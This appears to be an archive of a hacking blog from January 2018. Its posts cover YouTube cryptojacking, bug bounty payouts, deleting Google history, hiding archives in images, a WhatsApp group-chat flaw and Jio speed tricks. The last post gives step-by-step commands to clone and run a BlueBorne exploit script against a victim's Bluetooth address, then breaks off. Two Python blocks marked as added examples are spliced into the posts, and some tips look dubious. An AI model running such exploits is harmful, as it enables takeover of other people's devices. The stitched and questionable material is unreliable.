Monday, 29 January 2018

CRYPTOJACKING VIA YOUTUBE ADS? MINING MONERO?



YouTube viewers are upset that their computers are being used for cryptocurrency mining due to YouTube ads being hijacked with Coinhive.



Cryptojacking is a process that hijacks other people’s computers to mine cryptocurrency for the hijackers' benefit. Bitcoin and other digital coins are traded using a digital network called a blockchain, which must remain online at all times. Mining effectively keeps the lights on and provides the power for all the number crunching necessary to keep the blockchain going. Users who contribute lots of computing power are rewarded with coins.




While the value of cryptocurrencies continues to fluctuate, the desire for people to mine them hasn’t abated at all. In fact, many individuals look for additional ways to enhance their cryptocurrency mining. One option that many have turned to is the notorious Coinhive code that is often embedded in websites. Now it’s shown up in YouTube ads, as users of the video streaming platform are complaining of having their computers used to mine crypto for some third party.






MALICIOUS ADS TAKE MORE THAN YOUR TIME


Everyone who uses YouTube knows of its irritating ads. Most of them play before a video can be watched, but some will pop up in the middle of a streaming video. They’re an annoyance, but at least they only steal a few seconds of your time. That changed for a short time when a number of YouTube ads were hijacked with the Coinhive code.
The affected ads were from Google’s DoubleClick platform. Basically, the ads contained JavaScript that enabled cryptocurrency mining through Coinhive. YouTube users found their computer resources being consumed at a high rate (80%!) to mine Monero.




An independent security researcher, Troy Mursch, told Ars Technica:



YouTube was likely targeted because users are typically on the site for an extended period of time. This is a prime target for cryptojacking malware, because the longer the users are mining for cryptocurrency the more money is made.




GOOGLE RESPONDS


Once reports of the YouTube ads being used to mine Monero came out, Google (parent company of YouTube) said that the issue had been dealt with within two hours. However, data from social media and Trend Micro, a cybersecurity company, showed that the infected ads ran for up to a week.


Google did release an official statement that reads:


Mining cryptocurrency through ads is a relatively new form of abuse that violates our policies and one that we’ve been monitoring actively. We enforce our policies through a multi-layered detection system across our platforms which we update as new threats emerge. In this case, the ads were blocked in less than two hours and the malicious actors were quickly removed from our platforms.


The never-ending arms race between protection and hackers continues. The reality is that some people attempt to get others to mine crypto for them without their knowledge.



Keep learning keep hacking






Thursday, 25 January 2018

Top 32 Bug Bounty Programs in 2018




A bug bounty program is a deal offered by many websites and software developers by which individuals can receive recognition and compensation for reporting bugs, especially those pertaining to exploits and vulnerabilities.


1) Intel


Intel's bounty program mainly targets the company's hardware, firmware, and software.


Limitations: It does not include recent acquisitions, the company's web infrastructure, third-party products, or anything relating to McAfee.
Minimum Payout: Intel offers a minimum amount of $500 for finding bugs in their system.


Maximum Payout: The company pays a maximum of $30,000 for detecting critical bugs.


Bounty Link: https://security-center.intel.com/BugBountyProgram.aspx


2) Yahoo


Yahoo has a dedicated team that accepts vulnerability reports from security researchers and ethical hackers.


Limitations: The company does not offer any reward for finding bugs in yahoo.net, Yahoo 7, Yahoo Japan, Onwander and Yahoo-operated WordPress blogs.
Minimum Payout: There is no set limit on Yahoo for minimum payout.
Maximum Payout: Yahoo can pay $15000 for detecting important bugs in their system.

Bounty Link: https://safety.yahoo.com/Security/REPORTING-ISSUES.html



3) Snapchat


Snapchat's security team reviews all vulnerability reports and acts upon them through responsible disclosure. The company will acknowledge your submission within 30 days.
Minimum Payout: Snapchat will pay a minimum of $2000.
Maximum Payout: The maximum they will pay is $15,000.

Bounty Link: https://support.snapchat.com/en-US/i-need-help

4) Cisco


Cisco encourages individuals or organizations that are experiencing a product security issue to report it to the company.

Minimum Payout: Cisco's minimum payout amount is $100.

Maximum Payout: The company will give a maximum of $2,500 for finding serious vulnerabilities.


Bounty Link: https://www.cisco.com/c/en/us/about/security-center/security-vulnerability-policy.html



5) Dropbox


Dropbox's bounty program allows security researchers to report bugs and vulnerabilities on the third-party service HackerOne.

Minimum Payout: The minimum amount paid is $12,167.

Maximum Payout: The maximum amount offered is $32,768.

Bounty Link: https://www.dropbox.com/help/security/report-vulnerability



6) Apple


When Apple first launched its bug bounty program it allowed just 24 security researchers. The framework then expanded to include more bug bounty hunters.
The company will pay $100,000 to those who can extract data protected by Apple's Secure Enclave technology.
Minimum Payout: There is no fixed amount set by Apple Inc.


Maximum payout: The highest bounty given by Apple is $200,000 for security issues affecting its firmware.


Bounty Link: https://support.apple.com/en-au/HT201220



7) Facebook


Under Facebook's bug bounty program users can report a security issue on Facebook, Instagram, Atlas, WhatsApp, etc.

Limitations: There are a few security issues that the social networking platform considers out-of-bounds.
Minimum Payout: Facebook will pay a minimum of $500 for a disclosed vulnerability.
Maximum Payout: There is no upper limit fixed by Facebook for the Payout.


Bounty Link: https://www.facebook.com/whitehat/


8) Google


All content in .google.com, .blogger and youtube.com is open to Google's vulnerability rewards program.


Limitations: This bounty program only covers design and implementation issues.
Minimum Payout: Google will pay a minimum of $300 for finding security threats.
Maximum Payout: Google will pay the highest bounty of $31.337 for normal Google applications.


Bounty Link: https://www.google.com/about/appsecurity/reward-program/

9) Quora

Quora offers a bug bounty program to all users and researchers to find and report security vulnerabilities.


Minimum Payout: Quora will pay a minimum of $100 for finding vulnerabilities on their site.

Maximum Payout: Maximum payout offered by this site is $7000.


Bounty Link: https://engineering.quora.com/Security-Bug-Bounty-Program


10) Mozilla

Mozilla rewards vulnerability discoveries by ethical hackers and security researchers.


Limitations: The bounty is offered only for bugs in Mozilla services, such as Firefox, Thunderbird and other related applications and services.

Minimum Payout: The minimum amount given by Firefox is $500.


Maximum Payout: The Company is paying a maximum of $5000.

Bounty Link: https://www.mozilla.org/en-US/security/bug-bounty/


11) Microsoft


Microsoft's current bug bounty program was officially launched on 23rd September 2014 and deals only with Online Services.
Limitations: The bounty reward is only given for the critical and important vulnerabilities.


Minimum Payout: Microsoft is ready to pay $15,000 for finding critical bugs.


Maximum Payout: The maximum amount can be $250,000.

Bounty Link: https://technet.microsoft.com/en-us/library/dn425036.aspx

12) OpenSSL
OpenSSL bounty allows you to report vulnerabilities using secure email (PGP Key). You can also report vulnerabilities to the OpenSSL Management Committee.


Minimum Payout: The Company pays minimum bounty rewards of $500.


Maximum Payout: The highest amount given by the company is $5000.


Bounty Link: https://www.openssl.org/news/vulnerabilities.html


13) Vimeo


Vimeo welcomes reports of any security vulnerability in its products, and the company pays good rewards to the reporter.


Minimum Payout: The company will pay a minimum of $500.


Maximum Payout: The maximum amount paid by this company is $5000.


Bounty Link: https://vimeo.com/about/security


14) Apache

Apache encourages ethical hackers to report security vulnerabilities to one of their private security mailing lists.


Minimum Payout: The minimum payout amount given by Apache is $500.


Maximum Payout: This company can give a maximum reward of $3000.
Bounty Link: https://www.apache.org/security/


15) Twitter

Twitter allows security researchers and experts to report possible security vulnerabilities in their services. The company encourages people to find bugs.

Minimum Payout: Twitter pays a minimum amount of $140.

Maximum Payout: The maximum amount paid by the company is $15000.

Bounty Link: https://support.twitter.com/articles/477159

16) Avast


Avast's bounty program rewards ethical hackers and security researchers who report remote code execution, local privilege escalation, DoS and scanner bypass, among other issues.

Minimum Payout: Avast can pay you the minimum amount of $400.

Maximum Payout: The maximum amount offered by the company is $10,000.

Bounty Link: https://www.avast.com/bug-bounty


17) Paypal

Payment gateway service Paypal also offers bug bounty programs for security researchers.

Limitations: Vulnerabilities dependent upon social engineering techniques, Host Header, Denial of service (DoS), user-defined payload, content spoofing without embedded links/HTML, vulnerabilities which require a jailbroken mobile device, etc.

Minimum Payout: Paypal can pay a minimum of $50 for finding security vulnerabilities in their system.

Maximum Payout: The maximum payout amount given by Paypal is $10000.

Bounty Link: https://www.paypal.com/us/webapps/mpp/security-tools/reporting-security-issues



18) GitHub

GitHub has run its bug bounty program since 2013. Every successful participant earns points for their vulnerability submissions depending on the severity.


Limitation: The security researcher will receive that bounty only if they respect users' data and don't exploit any issue to produce an attack that could harm the integrity of GitHub's services or information.

Minimum Payout: Github pays a minimum amount of $200 for finding bugs.

Maximum Payout: Github can pay $10000 for finding critical bugs.

Bounty Link: https://bounty.github.com/


19) Uber

The vulnerability rewards program of Uber is primarily focused on protecting the data of users and its employees.


Minimum Payout: There is no predetermined minimum amount.

Maximum Payout: Uber will pay you $10,000 for finding a critical bug.

Bounty Link: https://eng.uber.com/bug-bounty/


20) Magento
Magento's bounty program allows you to report security vulnerabilities in Magento software or websites.


Limitations:
The following security research is not eligible for the bounty:
Potential or actual denial of service of Magento applications and systems.
Use of an exploit to view data without authorization.
Automated/scripted testing of web forms.


Minimum Payout: The minimum payout amount for this bounty program is $100.


Maximum Payout: Magento pays a maximum of $10,000 for finding critical bugs.


Bounty Link: https://magento.com/security


21) Perl

Perl is also running a bug bounty program. If someone finds a security vulnerability in Perl, they can contact the company.


Minimum Payout: The Company pays a minimum amount of $500.

Maximum Payout: The highest amount given by Perl


22) PHP


PHP allows ethical hackers to find bugs in their site.
Limitations: You need to check the list of already found bugs. If you do not follow this instruction, your bug is not considered.


Minimum Payout: The minimum payout amount is $500.


Maximum Payout: A maximum of $1500 is given by PHP for finding an important bug.


Bounty Link: https://bugs.php.net/report.php?bug_type=Security


23) Starbucks

Starbucks runs a bug bounty program to protect their customers. They encourage researchers to find malicious activity in their networks, web and mobile applications policies.


Minimum Payout: The minimum amount paid by Starbucks is $100.


Maximum Payout: The maximum amount goes up to $4000.


Bounty Link: https://www.starbucks.com/whitehat


24) AT&T


AT&T also has its own bug hunting channel. Developers and security experts can research the various platforms like websites, APIs, and mobile applications.


Minimum Payout: The minimum amount paid by them is $500.


Maximum Payout: There is no such upper limit for payout.
Bounty Link: https://bugbounty.att.com/home.php


25) LinkedIn

LinkedIn welcomes individual researchers who contribute their expertise and time to find bugs.
The company will reward you, but neither a minimum nor a maximum amount is fixed for this purpose.


Bounty Link: https://security.linkedin.com/posts/2015/private-bug-bounty-program



26) Paytm
Paytm invites independent security groups or individual researchers to study it across all platforms.


Limitations:
Reports that state that software is out of date/vulnerable without a 'Proof of Concept.'
XSS issues that affect only outdated browsers.
Stack traces that disclose information.
Any fraud issues


Minimum Payout: The Company will pay minimum $15 for finding bugs.


Maximum Payout: This company does not fix the upper limit.


Bounty Link: https://paytm.com/offer/bug-bounty/


27) Shopify

Shopify's Whitehat program rewards security researchers for finding severe security vulnerabilities.


Minimum Payout: The minimum amount paid by Shopify is $500.

Maximum Payout: There is no fixed upper limit for paying the bounty.

Bounty Link: https://www.shopify.in/whitehat


28) WordPress

WordPress also welcomes security researchers to report the bugs that they have found.


Minimum Payout: WordPress pays a minimum of $150 for reporting bugs on their site.


Maximum Payout: The Company does not fix a maximum limit to pay as bounty.


Bounty Link: https://make.wordpress.org/core/handbook/testing/reporting-bugs/


29) Zomato


Zomato helps security researchers identify security-related issues with the company's website or apps.


Minimum Payout: Zomato will pay a minimum of $1000 for finding important bugs.


Maximum Payout: There is no fixed maximum amount.


Bounty Link: https://www.zomato.com/security

30) Tor Project

Tor Project's bug bounty program covers two of its core services: its network daemon and browser.

Limitation: OpenSSL applications are excluded from this scope.

Minimum Payout: The minimum amount paid by them is $100.

Maximum Payout: The company will pay you a maximum of $4000.

Bounty Link: (no link available) security@lists.torproject.org


31) Hackerone

HackerOne is one of the biggest vulnerability coordination and bug bounty platforms. It helps companies to protect their consumer data by working with the global research community to find the most relevant security issues. Many known companies like Yahoo, Shopify, PHP, Google, Snapchat, and Wink use this website's service to reward security researchers and ethical hackers.


Bounty Link: https://hackerone.com/bug-bounty-programs


32) Bugcrowd


A powerful platform connecting the global security researcher community to the security market. This site aims to provide its worldwide clients with the right mix and type of researchers suited to the specific website. The hackers just need to select their reports on this site, and if they can detect the right bugs, the specific company will pay the amount to that person.


Bounty Link: https://www.bugcrowd.com/bug-bounty-list/

Wednesday, 17 January 2018

How to Erase Your Personal Info From Google


You have deleted your browser history, but Google still has your browsing history. Read this article to learn how to delete it.


It’s your Google Activity (formerly known as Google Web & App History), and it knows everything you’ve searched.


This post will teach you how to permanently delete your Google history to enhance your internet privacy and prevent your search and browsing data from following you around forever.

Note: Clearing your browser history is NOT the same as clearing your Google Web & App Activity history. When you clear your browser history, you’re only deleting the history that’s locally stored on your computer. Clearing your browser history doesn’t do anything to the data stored on Google’s servers.






How to download and delete your Google search history and stop Google from saving your activity





How to download all your Google data


Google’s Takeout feature lets you download data from all of the Google products you use, including your Google Search history, Gmail, Calendar, Chrome, Google Photos, Maps, and more. Here’s how to use Takeout to download all your Google data.


Step 1: From your Google Takeout “Download your data” page, select the data you’d like to download. By default, all of the boxes are selected. Select Next.









Step 2: Select your archive format and delivery method, then select Create archive. (We stuck with the default settings.)





Step 3: You’ll receive a notification when the archiving process is complete. In this example, we received an email with a link to download our archive.






Now that you’ve downloaded an archive of your data, you’re ready to delete your history.


______________________________________________________



How to delete all your Google activity



Use these steps to delete data about all your Google activity, including your searches, video searches, and any ads you’ve clicked on.

Step 1: From your My Activity page, select the vertical ellipsis (⋮), then select Delete activity by.






Step 2: Change the date from Today to All time. Select All products from the product drop-down menu, then select DELETE.




Step 3: Google will tell you how it uses your data to make its services more useful for you. Select OK.




Step 4: Google will ask you if you want to delete your activity. Select DELETE.





Step 5: Your screen should now say “No activity.”



Congratulations. You’ve now deleted your Google search history. Here’s to blank slates! Next up: Get Google to stop saving your activity.
_______________________________________________________


How to stop (or “pause”) Google from saving your activity



Google doesn’t provide a way to permanently disable it from saving your activity, but you can hit pause. Use these steps to hit pause on Google saving your activity.


Step 1: From your Activity controls page, you’ll see a section for “Web & App Activity.” Slide the switch to the left.





Step 2: Google will ask if you’d like to pause your Web & App Activity. Select PAUSE.





Step 3: Check to see if your activity is paused. The screen should say “Web & App Activity (paused)” and the sliding toggle should be grey.







Step 4: If you want to hit “pause” on Google logging your activity on ALL the Google apps and services you use, slide all the switches on this page to the left. Read the important information for each item and select PAUSE to complete each step.




Mission accomplished! Google won’t be saving your search data any more.   ☺☺☺☺

Sunday, 14 January 2018

Steganography? How to Hide Private Files in Images | Full Tutorial




Steganography is the art of hiding messages in such a way that no one, apart from the sender and receiver, suspects the existence of the hidden data. In this tutorial, you’ll learn a neat trick using which you can hide whatever data you want behind an image of your choice.

How to hide data inside images?

Create a folder. Name it anything you wish, say hide.



Now put anything and everything you want to hide in this folder. Text files, other images, executables – anything. Also, put the image behind which you want to hide the files in the same directory, say “image.jpg”.

Now we need to archive this folder. You can use your choice of compression tool for this (I recommend the free and open source 7-zip). So now we have hide.zip containing all of the data we want to hide behind an image.

Software used to compress files:

7-Zip – GNU Lesser General Public License
Compressor – Proprietary software
WinZip – Proprietary software
WinRAR – Commercial Licen

You should have your image, say image.jpg (inside of which we’ll hide our data) in the same directory as hide.zip (next to it).

Now simply open up the command prompt and move to the folder where image.jpg and hide.zip are located using the cd command:

cd PATH

For example:

cd C:\Folder
cd desktop

Now we type in the following command:

copy /b image.jpg + hide.zip output.jpg

After running this command, you should see an output.jpg in the folder and if you look closely, you’ll notice that its size has increased by approximately the size of the archive. Our data is now hidden behind the image.

The newly created output.jpg behaves like a normal image file, but you can also view the hidden data by opening the file with your compression tool, say 7-zip (Right click -> Open with -> 7-zip).



And that’s it! Now you can send this image to anyone. What others will see is just a regular image, but if the recipient knows, they will be able to access the secret information privately. You can also do this for other file types as well, such as .mp3, .wmv, .txt etc.

Of course, this is just a little trick and not a substitute for proper encryption (it could be if you added a password to your archive file). Still, it isn’t exactly subtle if you hide tens or hundreds of megabytes of data behind an innocent image file, which is why you should use proper encryption tools such as VeraCrypt if you have some important or confidential data that you wish to keep hidden.
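Why the trick is "not exactly subtle", shown as an added example that is not part of the original tutorial: a checker that walks the JPEG segment structure to the real end-of-image marker and reports anything appended after it, which is exactly what copy /b leaves behind. The sample image and archive are constructed in memory, and the function names are hypothetical.

```python
import io
import struct
import zipfile

EOI, SOS = 0xD9, 0xDA
NO_LENGTH = {0x01, *range(0xD0, 0xD8)}   # TEM and RST0-RST7 carry no length field


def skip_scan(data: bytes, pos: int) -> int:
    """Skip entropy-coded scan data; 0xFF00 stuffing and RSTn belong to it."""
    while pos + 1 < len(data):
        nxt = data[pos + 1]
        if data[pos] == 0xFF and nxt != 0x00 and not 0xD0 <= nxt <= 0xD7:
            return pos                   # a real marker follows the scan
        pos += 1
    return pos


def jpeg_end_offset(data: bytes) -> int:
    """Offset just past the real EOI marker, found by walking JPEG segments."""
    if data[:2] != b"\xff\xd8":
        raise ValueError("not a JPEG: missing SOI marker")
    pos = 2
    while pos + 1 < len(data):
        if data[pos] != 0xFF:
            raise ValueError(f"expected a marker at offset {pos}")
        marker = data[pos + 1]
        if marker == 0xFF:               # fill byte before a marker
            pos += 1
        elif marker == EOI:
            return pos + 2
        elif marker in NO_LENGTH:
            pos += 2
        else:
            if pos + 4 > len(data):
                break
            (length,) = struct.unpack(">H", data[pos + 2:pos + 4])
            if length < 2:
                raise ValueError(f"bad segment length at offset {pos}")
            pos += 2 + length            # jumps over EXIF thumbnails and the like
            if marker == SOS:
                pos = skip_scan(data, pos)
    raise ValueError("truncated JPEG: no EOI marker")


def naive_end_offset(data: bytes) -> int:
    """First FFD9 in the file; wrong when a segment payload contains FFD9."""
    return data.find(b"\xff\xd9") + 2


def inspect_image(data: bytes) -> dict:
    """Report bytes appended after the image and any ZIP members found there."""
    end = jpeg_end_offset(data)
    trailer = data[end:]
    report = {"jpeg_bytes": end, "trailing_bytes": len(trailer), "zip_members": []}
    if b"PK\x05\x06" in trailer:         # ZIP end-of-central-directory signature
        try:
            with zipfile.ZipFile(io.BytesIO(trailer)) as zf:
                report["zip_members"] = zf.namelist()
        except zipfile.BadZipFile:
            pass                         # signature bytes present, not a usable archive
    return report


def segment(marker: int, payload: bytes) -> bytes:
    return bytes([0xFF, marker]) + struct.pack(">H", len(payload) + 2) + payload


def build_sample_jpeg() -> bytes:
    """Constructed sample: valid marker structure, not a viewable photo."""
    app0 = segment(0xE0, b"JFIF\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00")
    # APP1 payload holding FFD8..FFD9, as an embedded thumbnail would.
    app1 = segment(0xE1, b"Exif\x00\x00" + b"\xff\xd8thumb\xff\xd9")
    sos = segment(SOS, b"\x01\x01\x00\x00\x3f\x00")
    scan = b"\x12\x34\xff\x00\x56\xff\xd0\x78"   # stuffed byte and RST0 inside
    return b"\xff\xd8" + app0 + app1 + sos + scan + b"\xff\xd9"


def build_sample_zip() -> bytes:
    """Constructed stand-in for hide.zip."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("hide/notes.txt", "constructed sample payload")
    return buf.getvalue()


if __name__ == "__main__":
    image = build_sample_jpeg()
    print("clean :", inspect_image(image))
    # Same byte-level result as: copy /b image.jpg + hide.zip output.jpg
    print("output:", inspect_image(image + build_sample_zip()))
```

Walking the segments matters because the first FFD9 in a real photo is often inside an embedded thumbnail, so a plain byte search reports a false end of image.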




Wednesday, 10 January 2018

WhatsApp Flaw Could Allow 'Potential Attackers' to Spy On Encrypted Group Chats



A more dramatic revelation of 2018—an outsider can secretly eavesdrop on your private end-to-end encrypted group chats on WhatsApp and Signal messaging apps.


Considering protection against three types of attackers—malicious user, network attacker, and malicious server—an end-to-end encryption protocol plays a vital role in securing instant messaging services.


The primary purpose of having end-to-end encryption is to stop trusting the intermediate servers in such a way that no one, not even the company or the server that transmits the data, can decrypt your messages or abuse its centralized position to manipulate the service.


In other words—assuming the worst-case scenario—a corrupt company employee should not be able to eavesdrop on the end-to-end encrypted communication by any means.


However, so far even the popular end-to-end encrypted messaging services, like WhatsApp, Threema and Signal, have not entirely achieved a zero-knowledge system.



Researchers from Ruhr-Universität Bochum (RUB) in Germany found that anyone who controls WhatsApp/Signal servers can covertly add new members to any private group, allowing them to spy on group conversations, even without the permission of the administrator.

As described by the researchers, in pairwise communication (when only two users communicate with each other) the server plays a limited role, but in the case of multi-user chats (group chats where encrypted messages are broadcast to many users), the role of the servers increases to manage the entire process.

That's where the issue resides, i.e. trusting the company's servers to manage group members (who eventually have full access to the group conversation) and their actions.

As explained in the newly published RUB paper, titled "More is Less: On the End-to-End Security of Group Chats in Signal, WhatsApp, and Threema," since both Signal and WhatsApp fail to properly authenticate who is adding a new member to the group, it is possible for an unauthorized person—not a group administrator or even a member of the group—to add someone to the group chat.




According to the researchers, a compromised admin or rogue employee with access to the server could manipulate (or block) the group management messages that are supposed to alert group members of a new member.

"The described weaknesses enable attacker A, who controls the WhatsApp server or can break the transport layer security, to take full control over a group. Entering the group, however, leaves traces since this operation is listed in the graphical user interface. The WhatsApp server can therefore use the fact that it can stealthily reorder and drop messages in the group," the paper reads.
"Thereby it can cache sent messages to the group, read their content first and decide in which order they are delivered to the members. Additionally, the WhatsApp server can forward these messages to the members individually such that a subtly chosen combination of messages can help it to cover the traces."




WhatsApp has acknowledged the issue, but argued that if any new member is added to a group, let's say by anyone, other group members will get notified for sure.



"We've looked at this issue carefully. Existing members are notified when new people are added to a WhatsApp group. We built WhatsApp so group messages cannot be sent to a hidden user," a WhatsApp spokesperson told Wired.
"The privacy and security of our users is incredibly important to WhatsApp. It's why we collect very little information and all messages sent on WhatsApp are end-to-end encrypted."


But if you are not part of a group with very select members, I'm sure many of you would easily ignore such notifications.
Researchers also advised companies to fix the issue just by adding an authentication mechanism to make sure that the "signed" group management messages come from the group administrator only.

However, this attack is not easy (exception—services under legal pressure) to execute, so users should not be worried about it.
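One way a client could enforce the fix the researchers recommend, as an added example that is not code from the paper, WhatsApp or Signal: a member applies a group management message only if it verifies under a key tied to a known administrator. It assumes an HMAC over the pairwise end-to-end key each member shares with the administrator as a standard-library stand-in for a signature; the message fields, MemberClient and all names are hypothetical.

```python
import hashlib
import hmac
import json
import secrets
from dataclasses import dataclass, field


def encode(update: dict) -> bytes:
    # Canonical encoding so sender and receiver authenticate the same bytes.
    return json.dumps(update, sort_keys=True, separators=(",", ":")).encode()


def admin_tag(pairwise_key: bytes, update: dict) -> bytes:
    """Tag the administrator attaches for one recipient (stand-in for a signature)."""
    return hmac.new(pairwise_key, encode(update), hashlib.sha256).digest()


@dataclass
class MemberClient:
    """One member's view of one group (hypothetical model)."""
    group_id: str
    members: set
    admin_keys: dict                       # admin name -> pairwise key with that admin
    last_seq: dict = field(default_factory=dict)

    def handle_update(self, update: dict, tag: bytes) -> bool:
        sender = update.get("sender")
        key = self.admin_keys.get(sender)
        if key is None:
            return False                   # sender is not an administrator we know
        if not hmac.compare_digest(admin_tag(key, update), tag):
            return False                   # forged, or altered by the server in transit
        if update.get("group") != self.group_id:
            return False                   # authentic, but for a different group
        if update.get("action") not in ("add", "remove") or "member" not in update:
            return False
        seq = update.get("seq", 0)
        if seq <= self.last_seq.get(sender, 0):
            return False                   # replayed or reordered management message
        self.last_seq[sender] = seq
        if update["action"] == "add":
            self.members.add(update["member"])
        else:
            self.members.discard(update["member"])
        return True


def run_demo() -> dict:
    key = secrets.token_bytes(32)          # constructed pairwise key: admin alice <-> bob
    bob = MemberClient("g1", {"alice", "bob"}, {"alice": key})

    legit = {"group": "g1", "sender": "alice", "action": "add",
             "member": "carol", "seq": 1}
    legit_tag = admin_tag(key, legit)

    # What a server can produce: any field values, but no valid tag.
    injected = dict(legit, member="eve", seq=2)
    non_admin = dict(injected, sender="server")
    tampered = dict(legit, member="eve")   # genuine tag attached to an altered body

    return {
        "legit": bob.handle_update(legit, legit_tag),
        "injected": bob.handle_update(injected, secrets.token_bytes(32)),
        "non_admin": bob.handle_update(non_admin, secrets.token_bytes(32)),
        "tampered": bob.handle_update(tampered, legit_tag),
        "replayed": bob.handle_update(legit, legit_tag),
        "members": sorted(bob.members),
    }


if __name__ == "__main__":
    for name, value in run_demo().items():
        print(f"{name:10} {value}")
```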























Hacker news

Sunday, 7 January 2018

Beware! Smartphone Apps Listen To Your Voice: How To Stop It


I have explained how smartphone apps listen to your voice and how to stop it. If you are an Android or iPhone user, you should read this article at least once. There are many apps in the Play Store and App Store that listen to your conversations silently in the background and send them to their servers.

The company says that it does use people's microphones, but only to help them out – and there’s an easy way of turning it off




Facebook could be listening in on people’s conversations all of the time, an expert has claimed.

The app might be using people’s phones to gather data on what they are talking about, it has been claimed.

Facebook says that its app does listen to what’s happening around it, but only as a way of seeing what people are listening to or watching and suggesting that they post about it.



Professor Burns has said that the tool appears to be using the audio it gathers not simply to help out users, but might be doing so to listen in to discussions and serve them with relevant advertising. She says that to test the feature, she discussed certain topics around the phone and then found that the site appeared to show relevant ads.




 



Watch video for how to stop it 




















                                                                  
















Hacker news

Saturday, 6 January 2018

HOW TO INCREASE JIO 4G NET SPEED [AWESOME TRICKS]



Steps to Increase Jio 4G Speed


1. First, open the Settings option on your phone.

2. Then open the Mobile Networks option in Settings.

3. Then tap on the access point name of your Reliance Jio SIM.

4. You need to select the SIM slot of the Jio SIM.

5. Select the Menu at the top right corner, choose New APN, then click Save. (The APN settings are given below.)



Setting the APN Network to Increase Jio 4g Speed



Name – jio 4g
APN – joined
APN Type – Default
Proxy – Not Set
Port – Not Set
Username – Not Set
Password – Not Set
Server – www.google.com
MMSC – Not Set
MMS proxy – Not Set
MMS port – Not Set
MCC – 405
MNC – 857, 863 or 874
Authentication type – PAP
APN Protocol – IPv4/IPv6
Bearer – LTE


By following this method you are simply changing a few settings of your mobile network; it won’t harm your device. You can change the settings at any time. If you make those changes, then you will get the high-speed net.





Step – 1 How to Increase Jio 4G Speed and Band Coverage



If you are not interested in downloading any app, you can follow these simple tricks to increase your Jio 4G speed. This trick will also increase the band coverage, so those who are struggling with a VPN can also try it. You have to choose between these options:



1. Best coverage: Band 5 > Band 3 > Band 40.
2. Best speed: Band 40 > Band 3 > Band 5


To increase speed follow these steps


Open the dialer application and dial:

👉*#*#4636#*#*

👉Select the phone information option

👉Select “Set preferred network type”

👉Select LTE Only





Steps to increase jio 4g speed For Qualcomm processor


👉Install Shortcut Master (Lite) application from Play Store.

👉Then go to Menu > Search

👉Type “carrier menu” or “engineering mode” and then search.

👉Open if found and access to change LTE bands


Steps to increase Jio 4G speed For MediaTek processor

👉Install MTK Engineering Mode from the Play Store

👉Open and Run the application

👉Then select ‘MTK Settings’

👉After that Select ‘BandMode’

👉Select SIM slot where you have placed your Jio SIM

👉Select ‘LTE mode’

👉Select band 40 for best speed or band 5 for best coverage




Step – 2 How To Increase Jio 4G Speed: APN Settings



Making a few changes to the APN can make a big difference to Jio 4G speed. Follow the steps below to change the APN settings:


Step 1: Go to Device Android ‘Settings’ > ‘Cellular Networks’ > ‘Access Point Names’


Step 2: Now select the profile named jio 4g, change only the entries given below, and leave the rest as default:


Server: www.google.com

Authentication Type: None

APN type: Default

Bearer: LTE

Now click on ‘Save’ changes and then select profile again.




Step – 3 How to Increase Jio Speed: Clear Cache


The Android system stores a lot of data from files and apps to improve the user experience. This data is referred to as the cache. Reliance Jio works a little differently: speed is not only related to SIM settings, and the Jio apps' data prevents you from downloading large content. So clearing the cache will help you improve internet speed. Follow these steps to increase Jio speed.




  1. Go To Your Device Android Settings
  2. Then visit Storage and USB
  3. Under Internal Storage just tap on cached Data
  4. Just confirm by clicking OK on clear cached Data
  5. That’s it, You just got increased Jio Speed



Step – 4 How to Increase Jio 4G Speed



  • First, download the VPN Master app or Snap VPN app from the Play Store, or any similar app; they are made for the same purpose.

  • After downloading the app just open it.

  • After starting the app, the server will be set to India; it takes up to fifteen seconds to connect, and sometimes only 2-3 seconds.

  • After connecting to the VPN, you can check the download speed; it will hit the maximum speed within a second.


If the internet speed hasn’t improved, you can change the country, but this should work anyway. If anybody asks me what the first-class trick to increase Jio 4G speed is, I would pick this.

Friday, 5 January 2018

BlueBorne Attack? Complete Practical, 5 Billion Devices at Risk




BlueBorne: Critical Bluetooth Attack Puts Billions of Devices at Risk of Hacking



If you are using a Bluetooth-enabled device, be it a smartphone, laptop, smart TV or any other IoT device, you are at risk of malware attacks that can be carried out remotely to take over your device, without requiring any interaction from your side.


Security researchers have just discovered a total of 8 zero-day vulnerabilities in the Bluetooth protocol that impact more than 5.3 billion devices using the short-range wireless communication technology, from Android, iOS, Windows and Linux to Internet of Things (IoT) devices.


Using these vulnerabilities, security researchers at IoT security firm Armis have devised an attack, dubbed BlueBorne, which could allow attackers to completely take over Bluetooth-enabled devices, spread malware, or even establish a "man-in-the-middle" connection to gain access to devices' critical data and networks without requiring any victim interaction.




All an attacker needs is for the victim's device to have Bluetooth turned on and, obviously, to be in close proximity to the attacker's device. Moreover, successful exploitation doesn't even require vulnerable devices to be paired with the attacker's device.


These vulnerabilities include:


👉Information Leak Vulnerability in Android (CVE-2017-0785)


👉Remote Code Execution Vulnerability (CVE-2017-0781) in Android's Bluetooth Network Encapsulation Protocol (BNEP) service



👉Remote Code Execution Vulnerability (CVE-2017-0782) in Android BNEP's Personal Area Networking (PAN) profile


👉The Bluetooth Pineapple in Android—Logical flaw (CVE-2017-0783)


👉Linux kernel Remote Code Execution vulnerability (CVE-2017-1000251)


👉Linux Bluetooth stack (BlueZ) information leak vulnerability (CVE-2017-1000250)


👉The Bluetooth Pineapple in Windows—Logical flaw (CVE-2017-8628)


👉Apple Low Energy Audio Protocol Remote Code Execution vulnerability (CVE Pending)




Google and Microsoft have already made security patches available to their customers, while Apple iOS devices running the most recent version of its mobile operating system (that is 10.x) are safe.




👇👇How to Perform👇👇

CVE-2017-0785 STEP 1

Now at this point, I am wondering if Armis left this information out of the white paper intentionally: if you send more packets to the device, you can dump a lot more memory, and in this memory you will see some interesting things. They say you can find "encryption key, address space and valuable pointers (of code and or data) that can be used to bypass ASLR while exploiting a separate memory corruption vulnerability", so let's see what I found!

The dangers of Bluetooth implementations: Unveiling zero day vulnerabilities and security flaws in modern Bluetooth stacks.




Open kali linux Terminal


Type

cd Desktop





git clone https://github.com/mailinneberg/BlueBorne.git




cd BlueBorne




ls

chmod  +x  CVE-2017-0785.py




ls





sudo apt-get install bluetooth libbluetooth-dev





 sudo pip install pybluez 




sudo pip install pwntools



ls


python CVE-2017-0785.py



Now the script is run. TARGET xx:xx:xx:xx:xx is the Bluetooth address of the device which I want to attack.








How to grab victim's bluetooth MAC address

FIRE UP Kali


